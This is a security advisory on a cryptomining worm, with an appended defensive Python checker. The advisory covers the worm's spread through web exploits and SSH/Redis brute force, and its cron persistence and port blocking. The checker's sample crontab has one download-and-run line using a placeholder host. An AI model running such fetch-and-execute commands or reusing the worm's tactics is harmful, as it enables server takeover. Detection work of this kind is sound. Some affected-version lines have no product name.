A new form of malware has been spotted; the code's main focus is the fraudulent mining of the Monero (XMR) cryptocurrency.
The worm spreads by attempting to exploit four web application vulnerabilities or by brute forcing Secure Shell (SSH) and Redis database services on the target system using a hardcoded set of credentials. Once the worm is established on the system, it downloads and executes three scripts.
The first script contains a set of installation instructions; the second and third scripts contain the code and configuration for the cryptocurrency miner. When the first script executes, it attempts to carry out a series of activities:
- The script attempts to disable security features including SELinux.
- A scheduled job is created that downloads and runs the installation script every fifteen minutes in order to maintain persistence.
- All processes with a CPU usage greater than 30% are killed.
- The script attempts to connect to every SSH host already known to the system and execute the payload on it.
- The cryptocurrency miner is installed and run as a service.
The malware will also block outgoing traffic on ports 3333, 5555, 7777, and 9999, which F5 says is likely due to these ports being used by other cryptocurrency miners.
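As an added defender-side example (not part of the advisory), the following Python checks two of the host artefacts described above, the 15-minute download-and-run cron job and the outbound blocks on ports 3333, 5555, 7777 and 9999, against constructed crontab and `iptables -S` samples; the download host is a placeholder.

```python
import re

# Outbound ports the advisory says the worm blocks (rival miner traffic).
BLOCKED_MINER_PORTS = {"3333", "5555", "7777", "9999"}

# Constructed sample crontab; PLACEHOLDER-HOST is not a real indicator.
SAMPLE_CRONTAB = """\
0 2 * * * /usr/bin/certbot renew --quiet
*/15 * * * * curl -fsSL http://PLACEHOLDER-HOST/install.sh | sh
"""

# Constructed sample of `iptables -S` output.
SAMPLE_IPTABLES = """\
-P OUTPUT ACCEPT
-A OUTPUT -p tcp --dport 3333 -j DROP
-A OUTPUT -p tcp --dport 5555 -j DROP
-A OUTPUT -p tcp --dport 7777 -j DROP
-A OUTPUT -p tcp --dport 9999 -j DROP
"""

CRON_15MIN_RE = re.compile(r"^\*/15\s+\*\s+\*\s+\*\s+\*\s+(.*)$")
FETCH_AND_RUN_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")
DPORT_DROP_RE = re.compile(r"-A OUTPUT\b.*--dport\s+(\d+)\b.*-j\s+(DROP|REJECT)")

def find_persistence_cron(crontab_text):
    """Return cron commands that run every 15 minutes and pipe a download into a shell."""
    hits = []
    for line in crontab_text.splitlines():
        m = CRON_15MIN_RE.match(line.strip())
        if m and FETCH_AND_RUN_RE.search(m.group(1)):
            hits.append(m.group(1))
    return hits

def find_blocked_miner_ports(iptables_text):
    """Return the advisory-listed ports that are dropped or rejected outbound."""
    blocked = set()
    for line in iptables_text.splitlines():
        m = DPORT_DROP_RE.search(line)
        if m and m.group(1) in BLOCKED_MINER_PORTS:
            blocked.add(m.group(1))
    return blocked

def assess(crontab_text, iptables_text):
    """Combine both checks into a list of human-readable findings."""
    findings = []
    cron_hits = find_persistence_cron(crontab_text)
    if cron_hits:
        findings.append("persistence cron: " + "; ".join(cron_hits))
    ports = find_blocked_miner_ports(iptables_text)
    if ports:
        findings.append("outbound miner ports blocked: " + ", ".join(sorted(ports)))
    return findings

if __name__ == "__main__":
    for finding in assess(SAMPLE_CRONTAB, SAMPLE_IPTABLES):
        print("[!]", finding)
```

On a live host, feed the output of `crontab -l` for each user and of `iptables -S` into `assess()`; either finding alone warrants a closer look at the system.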
Linux servers with one or more of the following enabled or installed:
- Redis Database services – All versions
- ThinkPHP – Versions prior to 3.2.4
- Atlassian Confluence Server and Confluence Data Center:
  - Versions prior to 6.6.12
  - Versions from 6.7.0 prior to version 6.12.3
  - Versions 6.13.0 prior to version 6.13.3
  - Version 6.14.0 prior to 6.14.2
- Versions 8.2.x and earlier
- Versions 7.x prior to version 7.58
- Versions 8.3.x prior to version 8.3.9
- Versions 8.4.x prior to version 8.4.6
- Versions 8.5.x prior to version 8.5.1